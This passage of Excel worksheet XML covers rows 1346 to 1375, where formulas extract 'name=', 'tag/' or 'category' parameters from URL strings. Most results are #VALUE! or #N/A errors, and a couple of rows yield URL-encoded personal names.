    ISNUMBER(FIND("name=",$A1346)), MID($A1346, FIND("name=",$A1346) + 5, LEN($A1346) - FIND("name=",$A1346)),
    ISNUMBER(FIND("tag/",$A1346)), MID($A1346, FIND("tag/",$A1346) + 4, LEN($A1346) - FIND("tag/",$A1346)),
    ISNUMBER(FIND("category",$A1346)), MID($A1346, FIND("category",$A1346) + 9, LEN($A1346) - FIND("category",$A1346)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1346" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1347" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1347" t="s">
        <v>2504</v>
      </c>
      <c r="B1347" t="e">
        <f t="shared" si="61"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1347" t="e">
        <f t="shared" si="62"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1347" t="e">
        <f t="shared" si="63"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1347" t="e" cm="1">
        <f t="array" ref="E1347">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1347)), MID($A1347, FIND("name=",$A1347) + 5, LEN($A1347) - FIND("name=",$A1347)),
    ISNUMBER(FIND("tag/",$A1347)), MID($A1347, FIND("tag/",$A1347) + 4, LEN($A1347) - FIND("tag/",$A1347)),
    ISNUMBER(FIND("category",$A1347)), MID($A1347, FIND("category",$A1347) + 9, LEN($A1347) - FIND("category",$A1347)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1347" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1348" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1348" t="s">
        <v>2288</v>
      </c>
      <c r="B1348" t="e">
        <f t="shared" si="61"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1348" t="e">
        <f t="shared" si="62"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1348" t="e">
        <f t="shared" si="63"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1348" t="e" cm="1">
        <f t="array" ref="E1348">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1348)), MID($A1348, FIND("name=",$A1348) + 5, LEN($A1348) - FIND("name=",$A1348)),
    ISNUMBER(FIND("tag/",$A1348)), MID($A1348, FIND("tag/",$A1348) + 4, LEN($A1348) - FIND("tag/",$A1348)),
    ISNUMBER(FIND("category",$A1348)), MID($A1348, FIND("category",$A1348) + 9, LEN($A1348) - FIND("category",$A1348)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1348" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1349" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1349" t="s">
        <v>2346</v>
      </c>
      <c r="B1349" t="e">
        <f t="shared" si="61"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1349" t="e">
        <f t="shared" si="62"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1349" t="e">
        <f t="shared" si="63"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1349" t="e" cm="1">
        <f t="array" ref="E1349">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1349)), MID($A1349, FIND("name=",$A1349) + 5, LEN($A1349) - FIND("name=",$A1349)),
    ISNUMBER(FIND("tag/",$A1349)), MID($A1349, FIND("tag/",$A1349) + 4, LEN($A1349) - FIND("tag/",$A1349)),
    ISNUMBER(FIND("category",$A1349)), MID($A1349, FIND("category",$A1349) + 9, LEN($A1349) - FIND("category",$A1349)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1349" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1350" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1350" t="s">
        <v>2368</v>
      </c>
      <c r="B1350" t="e">
        <f t="shared" ref="B1350:B1413" si="64">IF(FIND("name=",A1350,1)&gt;0,MID(A1350,FIND("name=",A1350,1)+5,LEN(A1350)-FIND("name=",A1350,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="C1350" t="e">
        <f t="shared" ref="C1350:C1413" si="65">IF(FIND("tag/",$A1350,1)&gt;0,MID($A1350,FIND("tag/",$A1350,1)+4,LEN($A1350)-FIND("tag/",$A1350,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="D1350" t="e">
        <f t="shared" si="63"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1350" t="e" cm="1">
        <f t="array" ref="E1350">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1350)), MID($A1350, FIND("name=",$A1350) + 5, LEN($A1350) - FIND("name=",$A1350)),
    ISNUMBER(FIND("tag/",$A1350)), MID($A1350, FIND("tag/",$A1350) + 4, LEN($A1350) - FIND("tag/",$A1350)),
    ISNUMBER(FIND("category",$A1350)), MID($A1350, FIND("category",$A1350) + 9, LEN($A1350) - FIND("category",$A1350)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1350" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1351" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1351" t="s">
        <v>2410</v>
      </c>
      <c r="B1351" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1351" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1351" t="e">
        <f t="shared" si="63"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1351" t="e" cm="1">
        <f t="array" ref="E1351">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1351)), MID($A1351, FIND("name=",$A1351) + 5, LEN($A1351) - FIND("name=",$A1351)),
    ISNUMBER(FIND("tag/",$A1351)), MID($A1351, FIND("tag/",$A1351) + 4, LEN($A1351) - FIND("tag/",$A1351)),
    ISNUMBER(FIND("category",$A1351)), MID($A1351, FIND("category",$A1351) + 9, LEN($A1351) - FIND("category",$A1351)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1351" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1352" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1352" t="s">
        <v>2377</v>
      </c>
      <c r="B1352" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1352" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1352" t="e">
        <f t="shared" si="63"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1352" t="e" cm="1">
        <f t="array" ref="E1352">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1352)), MID($A1352, FIND("name=",$A1352) + 5, LEN($A1352) - FIND("name=",$A1352)),
    ISNUMBER(FIND("tag/",$A1352)), MID($A1352, FIND("tag/",$A1352) + 4, LEN($A1352) - FIND("tag/",$A1352)),
    ISNUMBER(FIND("category",$A1352)), MID($A1352, FIND("category",$A1352) + 9, LEN($A1352) - FIND("category",$A1352)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1352" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1353" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1353" t="s">
        <v>2505</v>
      </c>
      <c r="B1353" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1353" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1353" t="e">
        <f t="shared" si="63"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1353" t="e" cm="1">
        <f t="array" ref="E1353">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1353)), MID($A1353, FIND("name=",$A1353) + 5, LEN($A1353) - FIND("name=",$A1353)),
    ISNUMBER(FIND("tag/",$A1353)), MID($A1353, FIND("tag/",$A1353) + 4, LEN($A1353) - FIND("tag/",$A1353)),
    ISNUMBER(FIND("category",$A1353)), MID($A1353, FIND("category",$A1353) + 9, LEN($A1353) - FIND("category",$A1353)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1353" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1354" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1354" t="s">
        <v>2506</v>
      </c>
      <c r="B1354" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1354" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1354" t="e">
        <f t="shared" si="63"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1354" t="e" cm="1">
        <f t="array" ref="E1354">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1354)), MID($A1354, FIND("name=",$A1354) + 5, LEN($A1354) - FIND("name=",$A1354)),
    ISNUMBER(FIND("tag/",$A1354)), MID($A1354, FIND("tag/",$A1354) + 4, LEN($A1354) - FIND("tag/",$A1354)),
    ISNUMBER(FIND("category",$A1354)), MID($A1354, FIND("category",$A1354) + 9, LEN($A1354) - FIND("category",$A1354)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1354" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1355" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1355" t="s">
        <v>2507</v>
      </c>
      <c r="B1355" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1355" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1355" t="e">
        <f t="shared" ref="D1355:D1418" si="66">IF(FIND("category",$A1355,1)&gt;0,MID($A1355,FIND("category",$A1355,1)+9,LEN($A1355)-FIND("category",$A1355,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="E1355" t="e" cm="1">
        <f t="array" ref="E1355">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1355)), MID($A1355, FIND("name=",$A1355) + 5, LEN($A1355) - FIND("name=",$A1355)),
    ISNUMBER(FIND("tag/",$A1355)), MID($A1355, FIND("tag/",$A1355) + 4, LEN($A1355) - FIND("tag/",$A1355)),
    ISNUMBER(FIND("category",$A1355)), MID($A1355, FIND("category",$A1355) + 9, LEN($A1355) - FIND("category",$A1355)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1355" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1356" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1356" t="s">
        <v>2508</v>
      </c>
      <c r="B1356" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1356" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1356" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1356" t="e" cm="1">
        <f t="array" ref="E1356">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1356)), MID($A1356, FIND("name=",$A1356) + 5, LEN($A1356) - FIND("name=",$A1356)),
    ISNUMBER(FIND("tag/",$A1356)), MID($A1356, FIND("tag/",$A1356) + 4, LEN($A1356) - FIND("tag/",$A1356)),
    ISNUMBER(FIND("category",$A1356)), MID($A1356, FIND("category",$A1356) + 9, LEN($A1356) - FIND("category",$A1356)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1356" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1357" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1357" t="s">
        <v>2503</v>
      </c>
      <c r="B1357" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1357" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1357" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1357" t="e" cm="1">
        <f t="array" ref="E1357">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1357)), MID($A1357, FIND("name=",$A1357) + 5, LEN($A1357) - FIND("name=",$A1357)),
    ISNUMBER(FIND("tag/",$A1357)), MID($A1357, FIND("tag/",$A1357) + 4, LEN($A1357) - FIND("tag/",$A1357)),
    ISNUMBER(FIND("category",$A1357)), MID($A1357, FIND("category",$A1357) + 9, LEN($A1357) - FIND("category",$A1357)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1357" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1358" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1358" t="s">
        <v>2504</v>
      </c>
      <c r="B1358" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1358" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1358" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1358" t="e" cm="1">
        <f t="array" ref="E1358">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1358)), MID($A1358, FIND("name=",$A1358) + 5, LEN($A1358) - FIND("name=",$A1358)),
    ISNUMBER(FIND("tag/",$A1358)), MID($A1358, FIND("tag/",$A1358) + 4, LEN($A1358) - FIND("tag/",$A1358)),
    ISNUMBER(FIND("category",$A1358)), MID($A1358, FIND("category",$A1358) + 9, LEN($A1358) - FIND("category",$A1358)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1358" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1359" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1359" t="s">
        <v>2410</v>
      </c>
      <c r="B1359" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1359" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1359" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1359" t="e" cm="1">
        <f t="array" ref="E1359">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1359)), MID($A1359, FIND("name=",$A1359) + 5, LEN($A1359) - FIND("name=",$A1359)),
    ISNUMBER(FIND("tag/",$A1359)), MID($A1359, FIND("tag/",$A1359) + 4, LEN($A1359) - FIND("tag/",$A1359)),
    ISNUMBER(FIND("category",$A1359)), MID($A1359, FIND("category",$A1359) + 9, LEN($A1359) - FIND("category",$A1359)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1359" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1360" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1360" t="s">
        <v>2377</v>
      </c>
      <c r="B1360" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1360" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1360" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1360" t="e" cm="1">
        <f t="array" ref="E1360">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1360)), MID($A1360, FIND("name=",$A1360) + 5, LEN($A1360) - FIND("name=",$A1360)),
    ISNUMBER(FIND("tag/",$A1360)), MID($A1360, FIND("tag/",$A1360) + 4, LEN($A1360) - FIND("tag/",$A1360)),
    ISNUMBER(FIND("category",$A1360)), MID($A1360, FIND("category",$A1360) + 9, LEN($A1360) - FIND("category",$A1360)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1360" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1361" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1361" t="s">
        <v>2488</v>
      </c>
      <c r="B1361" t="str">
        <f t="shared" si="64"/>
        <v>Trisha%20Krishnan&amp;date=2023-12-01</v>
      </c>
      <c r="C1361" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1361" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1361" t="str" cm="1">
        <f t="array" ref="E1361">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1361)), MID($A1361, FIND("name=",$A1361) + 5, LEN($A1361) - FIND("name=",$A1361)),
    ISNUMBER(FIND("tag/",$A1361)), MID($A1361, FIND("tag/",$A1361) + 4, LEN($A1361) - FIND("tag/",$A1361)),
    ISNUMBER(FIND("category",$A1361)), MID($A1361, FIND("category",$A1361) + 9, LEN($A1361) - FIND("category",$A1361)))</f>
        <v>Trisha%20Krishnan&amp;date=2023-12-01</v>
      </c>
      <c r="F1361" t="s">
        <v>3360</v>
      </c>
    </row>
    <row r="1362" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1362" t="s">
        <v>2503</v>
      </c>
      <c r="B1362" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1362" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1362" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1362" t="e" cm="1">
        <f t="array" ref="E1362">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1362)), MID($A1362, FIND("name=",$A1362) + 5, LEN($A1362) - FIND("name=",$A1362)),
    ISNUMBER(FIND("tag/",$A1362)), MID($A1362, FIND("tag/",$A1362) + 4, LEN($A1362) - FIND("tag/",$A1362)),
    ISNUMBER(FIND("category",$A1362)), MID($A1362, FIND("category",$A1362) + 9, LEN($A1362) - FIND("category",$A1362)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1362" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1363" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1363" t="s">
        <v>2504</v>
      </c>
      <c r="B1363" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1363" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1363" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1363" t="e" cm="1">
        <f t="array" ref="E1363">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1363)), MID($A1363, FIND("name=",$A1363) + 5, LEN($A1363) - FIND("name=",$A1363)),
    ISNUMBER(FIND("tag/",$A1363)), MID($A1363, FIND("tag/",$A1363) + 4, LEN($A1363) - FIND("tag/",$A1363)),
    ISNUMBER(FIND("category",$A1363)), MID($A1363, FIND("category",$A1363) + 9, LEN($A1363) - FIND("category",$A1363)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1363" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1364" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1364" t="s">
        <v>2248</v>
      </c>
      <c r="B1364" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1364" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1364" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1364" t="e" cm="1">
        <f t="array" ref="E1364">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1364)), MID($A1364, FIND("name=",$A1364) + 5, LEN($A1364) - FIND("name=",$A1364)),
    ISNUMBER(FIND("tag/",$A1364)), MID($A1364, FIND("tag/",$A1364) + 4, LEN($A1364) - FIND("tag/",$A1364)),
    ISNUMBER(FIND("category",$A1364)), MID($A1364, FIND("category",$A1364) + 9, LEN($A1364) - FIND("category",$A1364)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1364" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1365" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1365" t="s">
        <v>2248</v>
      </c>
      <c r="B1365" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1365" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1365" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1365" t="e" cm="1">
        <f t="array" ref="E1365">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1365)), MID($A1365, FIND("name=",$A1365) + 5, LEN($A1365) - FIND("name=",$A1365)),
    ISNUMBER(FIND("tag/",$A1365)), MID($A1365, FIND("tag/",$A1365) + 4, LEN($A1365) - FIND("tag/",$A1365)),
    ISNUMBER(FIND("category",$A1365)), MID($A1365, FIND("category",$A1365) + 9, LEN($A1365) - FIND("category",$A1365)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1365" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1366" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1366" t="s">
        <v>2342</v>
      </c>
      <c r="B1366" t="str">
        <f t="shared" si="64"/>
        <v>Shubha%20Poonja</v>
      </c>
      <c r="C1366" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1366" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1366" t="str" cm="1">
        <f t="array" ref="E1366">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1366)), MID($A1366, FIND("name=",$A1366) + 5, LEN($A1366) - FIND("name=",$A1366)),
    ISNUMBER(FIND("tag/",$A1366)), MID($A1366, FIND("tag/",$A1366) + 4, LEN($A1366) - FIND("tag/",$A1366)),
    ISNUMBER(FIND("category",$A1366)), MID($A1366, FIND("category",$A1366) + 9, LEN($A1366) - FIND("category",$A1366)))</f>
        <v>Shubha%20Poonja</v>
      </c>
      <c r="F1366" t="s">
        <v>3334</v>
      </c>
    </row>
    <row r="1367" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1367" t="s">
        <v>2248</v>
      </c>
      <c r="B1367" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1367" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1367" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1367" t="e" cm="1">
        <f t="array" ref="E1367">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1367)), MID($A1367, FIND("name=",$A1367) + 5, LEN($A1367) - FIND("name=",$A1367)),
    ISNUMBER(FIND("tag/",$A1367)), MID($A1367, FIND("tag/",$A1367) + 4, LEN($A1367) - FIND("tag/",$A1367)),
    ISNUMBER(FIND("category",$A1367)), MID($A1367, FIND("category",$A1367) + 9, LEN($A1367) - FIND("category",$A1367)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1367" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1368" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1368" t="s">
        <v>2511</v>
      </c>
      <c r="B1368" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1368" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1368" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1368" t="e" cm="1">
        <f t="array" ref="E1368">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1368)), MID($A1368, FIND("name=",$A1368) + 5, LEN($A1368) - FIND("name=",$A1368)),
    ISNUMBER(FIND("tag/",$A1368)), MID($A1368, FIND("tag/",$A1368) + 4, LEN($A1368) - FIND("tag/",$A1368)),
    ISNUMBER(FIND("category",$A1368)), MID($A1368, FIND("category",$A1368) + 9, LEN($A1368) - FIND("category",$A1368)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1368" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1369" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1369" t="s">
        <v>2248</v>
      </c>
      <c r="B1369" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1369" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1369" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1369" t="e" cm="1">
        <f t="array" ref="E1369">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1369)), MID($A1369, FIND("name=",$A1369) + 5, LEN($A1369) - FIND("name=",$A1369)),
    ISNUMBER(FIND("tag/",$A1369)), MID($A1369, FIND("tag/",$A1369) + 4, LEN($A1369) - FIND("tag/",$A1369)),
    ISNUMBER(FIND("category",$A1369)), MID($A1369, FIND("category",$A1369) + 9, LEN($A1369) - FIND("category",$A1369)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1369" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1370" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1370" t="s">
        <v>2543</v>
      </c>
      <c r="B1370" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1370" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1370" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1370" t="e" cm="1">
        <f t="array" ref="E1370">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1370)), MID($A1370, FIND("name=",$A1370) + 5, LEN($A1370) - FIND("name=",$A1370)),
    ISNUMBER(FIND("tag/",$A1370)), MID($A1370, FIND("tag/",$A1370) + 4, LEN($A1370) - FIND("tag/",$A1370)),
    ISNUMBER(FIND("category",$A1370)), MID($A1370, FIND("category",$A1370) + 9, LEN($A1370) - FIND("category",$A1370)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1370" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1371" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1371" t="s">
        <v>2559</v>
      </c>
      <c r="B1371" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1371" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1371" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1371" t="e" cm="1">
        <f t="array" ref="E1371">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1371)), MID($A1371, FIND("name=",$A1371) + 5, LEN($A1371) - FIND("name=",$A1371)),
    ISNUMBER(FIND("tag/",$A1371)), MID($A1371, FIND("tag/",$A1371) + 4, LEN($A1371) - FIND("tag/",$A1371)),
    ISNUMBER(FIND("category",$A1371)), MID($A1371, FIND("category",$A1371) + 9, LEN($A1371) - FIND("category",$A1371)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1371" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1372" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1372" t="s">
        <v>2560</v>
      </c>
      <c r="B1372" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1372" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1372" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1372" t="e" cm="1">
        <f t="array" ref="E1372">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1372)), MID($A1372, FIND("name=",$A1372) + 5, LEN($A1372) - FIND("name=",$A1372)),
    ISNUMBER(FIND("tag/",$A1372)), MID($A1372, FIND("tag/",$A1372) + 4, LEN($A1372) - FIND("tag/",$A1372)),
    ISNUMBER(FIND("category",$A1372)), MID($A1372, FIND("category",$A1372) + 9, LEN($A1372) - FIND("category",$A1372)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1372" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1373" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1373" t="s">
        <v>2346</v>
      </c>
      <c r="B1373" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1373" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1373" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1373" t="e" cm="1">
        <f t="array" ref="E1373">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1373)), MID($A1373, FIND("name=",$A1373) + 5, LEN($A1373) - FIND("name=",$A1373)),
    ISNUMBER(FIND("tag/",$A1373)), MID($A1373, FIND("tag/",$A1373) + 4, LEN($A1373) - FIND("tag/",$A1373)),
    ISNUMBER(FIND("category",$A1373)), MID($A1373, FIND("category",$A1373) + 9, LEN($A1373) - FIND("category",$A1373)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1373" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1374" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1374" t="s">
        <v>2368</v>
      </c>
      <c r="B1374" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1374" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1374" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1374" t="e" cm="1">
        <f t="array" ref="E1374">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1374)), MID($A1374, FIND("name=",$A1374) + 5, LEN($A1374) - FIND("name=",$A1374)),
    ISNUMBER(FIND("tag/",$A1374)), MID($A1374, FIND("tag/",$A1374) + 4, LEN($A1374) - FIND("tag/",$A1374)),
    ISNUMBER(FIND("category",$A1374)), MID($A1374, FIND("category",$A1374) + 9, LEN($A1374) - FIND("category",$A1374)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1374" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1375" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1375" t="s">
        <v>2377</v>
      </c>
      <c r="B1375" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1375" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1375" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
